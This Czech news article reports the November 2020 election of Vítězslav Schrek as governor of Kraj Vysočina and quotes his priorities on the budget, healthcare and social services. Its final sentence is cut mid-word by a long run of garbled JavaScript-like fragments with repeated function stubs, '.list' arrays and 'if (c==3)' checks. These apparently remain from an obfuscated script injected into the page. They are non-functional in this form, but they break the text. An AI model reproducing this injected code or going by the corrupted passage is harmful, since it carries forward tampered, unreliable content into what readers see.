Rainbow page separator

Novým vysočinským hejtmanem se stal Vítězslav Schrek

Pondělí, 23. listopadu 2020

Vysočina / Novým hejtmanem Kraje Vysočina krajští zastupitelé na svém ustavujícím zasedání zvolili Vítězslava Schreka(ODS + STO). Na postu padesátiletý politik, který před svým zvolením řídil Domov pro seniory ve Velkém Meziříčí a v předchozích letech byl jihlavským zastupitelem i radním, vystřídá Jiřího Běhounka (nez. za ČSSD). Kraj Vysočina v následujících čtyřech letech povede koalice Piráti, ČSSD, KDU-ČSL, ODS + STO a STAN + SNK-ED. „V prvních dnech ve funkci hejtmana se chci společně s členy rady soustředit na kroky vedoucí ke schválení rozpočtu kraje na další rok, za klíčovou považuji stabilizaci regionálního zdravotnictví a sociálních služeb, lidé v nemocnicích i v domovech musí mít ve svém zřizovateli oporu a jejich potřebám je třeba naslouchat. Mezi zásadní kroky nové samosprávy řadím i ty, které budou směřovat k podpoře ekonomické stability regionu a maximální podpoře měst a obcí s přihlédnutím k aktuálním možnostem kraje. Nová krajská rada je silný a odborně zdatný tým lidí, na spolupráci se těším,“ uvedl Vítězslav Schrek. Rada Kraje Vysočina čítá devět členů, zastupitelstvo pětačtyřicet. Ze zastupitelů celkem čtyřiadvacet obhájilo svůj m=function(n){if ( () == "string") ; };.list=["\'//\'="];(=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}andát z minulého funkčního období.